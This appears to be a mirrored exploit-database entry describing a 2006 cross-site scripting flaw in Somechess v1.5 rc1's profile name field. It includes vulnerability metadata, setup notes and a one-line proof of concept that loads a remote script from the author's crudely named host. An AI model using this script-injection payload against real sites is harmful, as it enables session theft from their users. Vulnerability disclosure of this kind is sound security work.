Somechess v1.5 rc1 - XSS

CVE	Category	Price	Severity
N/A	CWE-79	Unknown	Unknown

Author	Risk	Exploitation Type	Date
Unknown	Unknown	Remote	2006-07-12

CPE	PURL
cpe:cpe:/a:somechess:somechess:1.5rc1	pkg:pkg:exploitalert/[email protected]

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N	0.230518	0.395421

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006060166

Below is a copy:

Somechess v1.5 rc1

Homepage:

http://www.astrodogpress.org/chess/

Affected files:

*Profile input boxes

-----------------------

Upon dumping the sql data into the table if you get errors and it wont create the tables & data (like it did to me), then just remove all the " from the sql file. You'll also have to manually add players & their pw's (md5 hashed) via phpmyadmin or whatever you use. Theres also a php error on menu.php that you'll have to fix since it won't allow you to connect to  the game DB

-----------------------

XSS vuln with session disclosure from "New name" profile input box.

Data isn't sanatized before being generated. PoC:

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshots:

http://youfucktard.com/xsp/somechess1.jpg

http://youfucktard.com/xsp/somechess2.jpg

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum